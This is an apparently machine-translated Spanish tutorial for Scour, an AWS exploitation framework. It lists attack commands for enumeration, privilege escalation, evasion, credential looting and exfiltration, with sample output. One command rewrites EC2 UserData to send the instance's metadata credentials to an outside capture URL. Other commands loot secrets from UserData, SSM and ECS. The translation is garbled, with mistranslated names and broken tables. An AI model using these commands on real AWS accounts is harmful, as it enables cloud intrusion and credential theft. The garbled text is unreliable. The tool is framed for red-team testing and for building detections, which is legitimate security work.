Tutoriales

AWS Exploitation Framework !!! Tutoriales de Kali Linux

Buscar es un marco de explotación de AWS moderno, basado en módulos, escrito en Golang y desarrollado para Red Team Testing y Blue Team Analysis. Scour incorpora técnicas modernas que se pueden utilizar para atacar entornos o crear detecciones para la defensa.

propiedades

  • Finalización del comando
  • Lista de recursos dinámica
  • Historial de comandos
  • Modo de equipo azul (marca los ataques con un agente de usuario único)

instalación

Scour está escrito en Golang, por lo que se puede enviar fácilmente como un archivo binario.

##Accesible

vaya a github.com/grines/scour

##Para construir

ve a compilar main.go

Puede encontrar una guía de usuario más detallada y fácil de usar en la guía de instalación de la wiki. **próximamente, en breve, pronto

Módulo de limpieza

Scour utiliza varios módulos:

Observaciones

  • Scour es compatible con todos los sistemas operativos Linux / OSX.
  • Scour es un software de código abierto y se distribuye con una licencia de cláusula BSD 3.

Empezado

Cuando se inicia Scour por primera vez,

Comandos básicos en Scour

  • token profile <profile_name> <region> enumera los perfiles de AWS disponibles que se almacenan en ~ / aws / credentials.
  • token AssumeRole <role_name> <region> asume el rol de la misma cuenta o de una cuenta cruzada. ** requiere una sesión activa
  • help module devuelve la información de ayuda adecuada para el módulo especificado. ** Ayuda aún abierta
  • attack evasion <tactic> ejecuta el módulo especificado con sus parámetros estándar.

Ejecute Scour desde la línea de comando

  • scour cambiará al modo CLI
  • Not Connected <> token profile apiuser us-east-1 especifica la sesión utilizada para los comandos que requieren uno
  • Connected <apiuser/us-east-1> conectado activamente a un perfil de AWS desde (~, / aws / credentials) en (Región)
  • Connected <apiuser/us-east-1> attack enum <attack> Finalización de pestaña con lista de tácticas de bala disponibles
  • Connected <apiuser/us-east-1> attack privesc <attack> Finalización de pestaña con lista de tácticas de escalada de permisos disponibles
  • Connected <apiuser/us-east-1> attack lateral <attack> Finalización de pestaña con lista de tácticas secundarias disponibles
  • Connected <apiuser/us-east-1> attack evasion <attack> Finalización de pestaña con lista de tácticas evasivas disponibles
  • Connected <apiuser/us-east-1> attack creds <attack> Finalización de pestaña con lista de tácticas de descubrimiento de credenciales disponibles
  • Connected <apiuser/us-east-1> attack execute <attack> Finalización de pestaña con lista de tácticas de ejecución disponibles
  • Connected <apiuser/us-east-1> attack persist <attack> Finalización de pestaña con lista de tácticas de persistencia disponibles
  • Connected <apiuser/us-east-1> attack exfil <attack> Finalización de pestaña con lista de tácticas de exfiltración disponibles

enumeración

Conectado -Ataque Ahora la hierba Descubrimiento de IAM

+ ————- + ——————— + —————— + ————— + ————– +
| USUARIO | POLÍTICAS ADMINISTRADAS | DIRECTRICES EN LÍNEA | GRUPOS | ISPRIVILEGED |
+ ————- + ——————— + —————— + ————— + ————– +
| Administrador | Acceso de administrador | AllEKSInlineuser | Auditoría de seguridad | verdadero |
| EC2 | AmazonEC2FullAccess | | verdadero |
+ ————- + ——————— + —————— + ————— + ————– +

Connected <apiuser/us-east-1> attack enum Roles Reconocimiento de roles

Seguimiento de UA: exec-env / EVSWAyidC4 / o18HtFPe1P / role-enum
+ ———————————————————— + —————- + ————————————————– + —— ——– +
| PAPEL | Tipo principal | IDENTIDAD / SERVICIO | ISPRIVILEGED |
+ ———————————————————— + —————- + ————————————————– + —— ——– +
| Amazon_CodeBuild_dW6zqYHT3m | AWS | [arn:aws:iam::861293084598:root | true |
| | | codebuild.amazonaws.com] | |
| Amazon_CodeBuild_f2DOFPjMHK | Servicio [codebuild.amazonaws.com] | verdadero |
| Amazon_CodeBuild_HS59ko7lxn | Servicio [codebuild.amazonaws.com] | verdadero |
+ ———————————————————— + —————- + ———————————————–
– + ————– +

Connected <apiuser/us-east-1> attack enum EC2 Detección de EC2

Seguimiento de UA: exec-env / EVSWAyidC4 / dudqW7y1xb / ec2-enum
+ ——————— + —————————————————– + ————– + ———- + ————— + ————— ——- + ——– + ——— + ————– + ———- +
| ID DE INSTANCIA | PERFIL DE INSTANCIA | VPC | PUBLIC | IP PRIVADA | GRUPOS DE SEGURIDAD | PUERTOS | ESTADO | ISPRIVILEGED | ISPUBLIC |
+ ——————— + —————————————————– + ————– + ———- + ————— + ————— ——- + ——– + ——— + ————– + ———- +
| i-0f5604708c0b51429 | Ninguno | vpc-7e830c1a | Ninguno | 172.31.53.199 | sg-09fcd28717cf4f512 | 80 * | detenido | mal | verdadero |
| | | | | | | 22 * | | | |
| | | | | | | 5000 * | | | |
| i-03657fe3b9decdf51 | arn: aws: iam :: 861293084598: instance-profile / OrgAdmin | vpc-7e830c1a | Ninguno | 172.31.45.96 | sg-61b1fd07 | Todo * | detenido | verdadero | verdadero |
| | | | | | | 8888 * | | | |
| i-01b265a5fdc45df57 | Ninguno | vpc-7e830c1a | Ninguno | 172.31.38.118 | sg-0392f752f9b849d3f | 3389 * | detenido | mal | verdadero |
| i-0867709d6c0be74d9 | arn: aws: iam :: 861293084598: instance-profile / OrgAdmin | vpc-7e830c1a | Ninguno | 172.31.39.199 | sg-006543a34d2f70028 | 22 * | detenido | verdadero | verdadero |
| i-0d95790b5e7ddff23 | Ninguno | vpc-7e830c1a | Ninguno | 172.31.12.57 | sg-e1a50dac | 33391 * | detenido | mal | verdadero |
+ ——————— + —————————————————– + ————– + ———- + ————— + ——–

Connected <apiuser/us-east-1> attack enum S3 Detección de S3

Seguimiento de UA: exec-env / EVSWAyidC4 / GDGZaYQOuo / s3-enum
+ ——————————————- + ———– + ———– + ————– + ————- + ——————— + ——— —- + ————- + ———– +
| BUCKET | HASPOLITIC | ISWEBSITE | Permitir públicamente | PERMISOS | Permitir AUTENTICADO | PERMISOS | REPLICACIÓN | REGION |
+ ——————————————- + ———– + ———– + ————– + ————- + ——————— + ——— —- + ————- + ———– +
| amazon-conn3d79b01a | mal | mal | mal | | mal | | mal | us-west-2 |
| aws-cloudtrail-logs-98-cb39df0d | verdadero | mal | mal | | mal | | mal | | | Bullsecu | verdadero | verdadero | mal | | mal | | mal | | | connect-6ecad67 | mal | mal | mal | | mal | | mal | |
| conectar-5337c3 | mal | mal | mal | | mal | | mal | | | rescate | verdadero | mal | mal | | mal | | mal | |
| rojo * | mal | mal | mal | | mal | | mal | | | Re-
** | mal | mal | mal | | mal | | mal | us-west-2 |
| Terraform* | mal | mal | mal | | mal | | mal | |
+ ——————————————- + ———– + ———– + ————– + ————- + ——————— + ——— —- + ————- + ———– +

Connected <apiuser/us-east-1> attack enum Groups Detección de grupos

Seguimiento de UA: exec-env / EVSWAyidC4 / jAIKVdESpU / groups-enum
+ ———————————————– + ——————— + ————– + —————– + ————– +
| GRUPO | DIRECTRICES | ISPRIVILEGED | DIRECTRICES EN LÍNEA | ISPRIVILEGED |
+ ———————————————– + ——————— + ————– + —————– + ————– +
| EC2 | Auditoría de seguridad | mal | | mal |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 | | mal | | mal |
| Grupo de prueba | AmazonEC2FullAccess | verdadero | | mal |
| | Auditoría de seguridad | | | |
+ ———————————————– + ——————— + ————– + —————– + ————– +

Connected <apiuser/us-east-1> attack enum Network Deteccion de redes

Sigue abierto

Escalada de privilegios

  • Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data robar credenciales de metadatos de EC2. Detener la instancia / actualizar los datos del usuario para enviar credenciales a la URL especificada / iniciar la instancia (envía el token EC2 a la URL)

[Sun May 9 06:10:16 2021] INF detiene la instancia i-0f5604708c0b51429 – Estado: detenido
[Sun May 9 06:10:46 2021] INF Cambie el atributo de instancia UserData en i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF iniciar instancia i-0f5604708c0b51429 – Estado: pendiente

CredentialDiscovery

Connected <apiuser/us-east-1> attack creds UserData Saquear las credenciales de los datos de usuario de EC2

Seguimiento de UA: exec-env / yzaqX9HFvP / oL1oho99ZP / userdata-creds
+ ——————— + —————— + —————————————————————————- +
| ID DE INSTANCIA | REGLA | ENCONTRAR |
+ ——————— + —————— + —————————————————————————- +
| i-0f5604708c0b51429 | Webhook flojo | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Contraseña genérica | contraseña = thisisapassword |
+ ——————— + —————— + —————————————————————————- +

Connected <apiuser/us-east-1> attack creds SSM Credenciales de botín de Systems Manager

Seguimiento de UA: exec-env / yzaqX9HFvP / FASongUCcG / ssm-params-creds
+ ———— + ———- + ————————- +
| PARAMENAME | TIPO DE DATOS | VALOR |
+ ———— + ———- + ————————- +
| Prueba | Texto | esto puede ser una contraseña |
+ ———— + ———- + ————————- +

Connected <apiuser/us-east-1> attack creds ECS Saquear credenciales de ECS

Seguimiento de UA: exec-env / 9tsJFrIPmw / rEGaMfF5AI / ecs-creds
+ ————- + ——- + ———— +
| NOMBRE ENVARS | VALOR | DEFINICIÓN |
+ ————- + ——- + ———— +
| Secreto | aquí | Aplicación de muestra |
+ ————- + ——- + ———— +

LEER  Cómo configurar direcciones IP estáticas en Linux y Unix

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba